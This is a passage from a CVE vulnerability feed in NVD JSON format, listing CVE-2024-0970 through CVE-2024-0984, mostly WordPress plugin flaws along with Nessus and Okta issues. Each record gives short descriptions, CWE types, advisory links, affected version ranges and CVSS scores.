: "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3030044/armember-membership/trunk/core/classes/class.arm_restriction.php", "name" : "https://plugins.trac.wordpress.org/changeset/3030044/armember-membership/trunk/core/classes/class.arm_restriction.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ARMember plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"Default Restriction\" feature and view restricted post content." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:reputeinfosystems:armember:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "4.0.24", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0970", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/7df6877c-6640-41be-aacb-20c7da61e4db/", "name" : "https://wpscan.com/vulnerability/7df6877c-6640-41be-aacb-20c7da61e4db/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "This User Activity Tracking and Log WordPress plugin before 4.1.4 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mooveagency:user_activity_tracking_and_log:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.1.4", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-09T18:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0971", "ASSIGNER" : "vulnreport@tenable.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.tenable.com/security/tns-2024-01", "name" : "https://www.tenable.com/security/tns-2024-01", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.tenable.com/security/tns-2024-01", "name" : "https://www.tenable.com/security/tns-2024-01", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nA SQL injection vulnerability exists where an authenticated, low-privileged remote attacker could potentially alter scan DB content.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*", "versionEndExcluding" : "10.7.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-07T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0972", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/buddypress-members-only/trunk/buddypress-members-only.php#L682", "name" : "https://plugins.trac.wordpress.org/browser/buddypress-members-only/trunk/buddypress-members-only.php#L682", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dcfead67-d75d-46ae-ac68-a34643ac2f52?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dcfead67-d75d-46ae-ac68-a34643ac2f52?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/buddypress-members-only/trunk/buddypress-members-only.php#L682", "name" : "https://plugins.trac.wordpress.org/browser/buddypress-members-only/trunk/buddypress-members-only.php#L682", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dcfead67-d75d-46ae-ac68-a34643ac2f52?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dcfead67-d75d-46ae-ac68-a34643ac2f52?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The BuddyPress Members Only plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.5 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"All Other Sections On Your Site Will be Opened to Guest\" feature (when unset) and view restricted page and post content." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:membersonly:buddypress_members_only:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.3.5", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-06-06T04:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0973", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/798de421-4814-46a9-a055-ebb95a7218ed/", "name" : "https://wpscan.com/vulnerability/798de421-4814-46a9-a055-ebb95a7218ed/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/798de421-4814-46a9-a055-ebb95a7218ed/", "name" : "https://wpscan.com/vulnerability/798de421-4814-46a9-a055-ebb95a7218ed/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Widget for Social Page Feeds WordPress plugin before 6.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:patelmilap:widget_for_social_page_feeds:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.4", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-18T19:15Z", "lastModifiedDate" : "2025-05-05T18:53Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0974", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/7f8e5e63-a928-443e-9771-8b3f51f5eb9e/", "name" : "https://wpscan.com/vulnerability/7f8e5e63-a928-443e-9771-8b3f51f5eb9e/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/7f8e5e63-a928-443e-9771-8b3f51f5eb9e/", "name" : "https://wpscan.com/vulnerability/7f8e5e63-a928-443e-9771-8b3f51f5eb9e/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Social Media Widget WordPress plugin before 4.0.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bmwebproperties:social_media_widget:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.0.9", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-07-12T06:15Z", "lastModifiedDate" : "2025-06-10T15:54Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0975", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/wordpress-access-control/trunk/wordpress-access-control.php#L289", "name" : "https://plugins.trac.wordpress.org/browser/wordpress-access-control/trunk/wordpress-access-control.php#L289", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/wordpress-access-control/trunk/wordpress-access-control.php#L289", "name" : "https://plugins.trac.wordpress.org/browser/wordpress-access-control/trunk/wordpress-access-control.php#L289", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WordPress Access Control plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.0.13 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"Make Website Members Only\" feature (when unset) and view restricted page and post content." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:brandonwamboldt:wordpress_access_control:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "4.0.13", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-28T09:15Z", "lastModifiedDate" : "2025-02-07T01:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0976", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php#L32", "name" : "https://plugins.trac.wordpress.org/browser/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php#L32", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3039683/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php", "name" : "https://plugins.trac.wordpress.org/changeset/3039683/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php#L32", "name" : "https://plugins.trac.wordpress.org/browser/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php#L32", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3039683/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php", "name" : "https://plugins.trac.wordpress.org/changeset/3039683/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the plugin parameter in all versions up to, and including, 3.1.41 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wp-eventmanager:wp_event_manager:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.1.42", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-07T19:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0977", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Timeline Widget For Elementor (Elementor Timeline, Vertical & Horizontal Timeline) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image URLs in the plugin's timeline widget in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, changes the slideshow type, and then changes it back to an image." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:coolplugins:timeline_widget_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.5.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-07T08:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0978", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3036015/jonradio-private-site", "name" : "https://plugins.trac.wordpress.org/changeset/3036015/jonradio-private-site", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/970bc71c-7d0a-4761-874a-379cda71418e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/970bc71c-7d0a-4761-874a-379cda71418e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3036015/jonradio-private-site", "name" : "https://plugins.trac.wordpress.org/changeset/3036015/jonradio-private-site", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/970bc71c-7d0a-4761-874a-379cda71418e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/970bc71c-7d0a-4761-874a-379cda71418e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The My Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.14 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's site privacy feature and view restricted page and post content." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zatzlabs:my_private_site:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-03-04T12:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0979", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3101348%40dashboard-widgets-suite&new=3101348%40dashboard-widgets-suite&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3101348%40dashboard-widgets-suite&new=3101348%40dashboard-widgets-suite&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cfe4d99c-9cbd-4255-8f90-f904313d46b4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cfe4d99c-9cbd-4255-8f90-f904313d46b4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3101348%40dashboard-widgets-suite&new=3101348%40dashboard-widgets-suite&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3101348%40dashboard-widgets-suite&new=3101348%40dashboard-widgets-suite&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cfe4d99c-9cbd-4255-8f90-f904313d46b4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cfe4d99c-9cbd-4255-8f90-f904313d46b4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Dashboard Widgets Suite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 3.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:plugin-planet:dashboard_widgets_suite:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.4.4", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-06-13T09:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0980", "ASSIGNER" : "psirt@okta.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://trust.okta.com/security-advisories/okta-verify-windows-auto-update-arbitrary-code-execution-cve-2024-0980", "name" : "https://trust.okta.com/security-advisories/okta-verify-windows-auto-update-arbitrary-code-execution-cve-2024-0980", "refsource" : "", "tags" : [ ] }, { "url" : "https://trust.okta.com/security-advisories/okta-verify-windows-auto-update-arbitrary-code-execution-cve-2024-0980", "name" : "https://trust.okta.com/security-advisories/okta-verify-windows-auto-update-arbitrary-code-execution-cve-2024-0980", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Auto-update service for Okta Verify for Windows is vulnerable to two flaws which in combination could be used to execute arbitrary code." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-28T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0981", "ASSIGNER" : "psirt@okta.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://trust.okta.com/security-advisories/okta-browser-plugin-reflected-cross-site-scripting-cve-2024-0981", "name" : "https://trust.okta.com/security-advisories/okta-browser-plugin-reflected-cross-site-scripting-cve-2024-0981", "refsource" : "", "tags" : [ ] }, { "url" : "https://trust.okta.com/security-advisories/okta-browser-plugin-reflected-cross-site-scripting-cve-2024-0981", "name" : "https://trust.okta.com/security-advisories/okta-browser-plugin-reflected-cross-site-scripting-cve-2024-0981", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Okta Browser Plugin versions 6.5.0 through 6.31.0 (Chrome/Edge/Firefox/Safari) are vulnerable to cross-site scripting. This issue occurs when the plugin prompts the user to save these credentials within Okta Personal. A fix was implemented to properly escape these fields, addressing the vulnerability. Importantly, if Okta Personal is not added to the plugin to enable multi-account view, the Workforce Identity Cloud plugin is not affected by this issue. The vulnerability is fixed in Okta Browser Plugin version 6.32.0 for Chrome/Edge/Safari/Firefox." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-07-23T21:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0983", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression", "name" : "https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression", "name" : "https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the enableOptimization function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to enable image optimization." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:imagerecycle:imagerecycle_pdf_\\&_image_compression:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.1.14", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2024-12-27T16:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0984", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression", "name" : "https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression", "name" : "https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the disableOptimization function 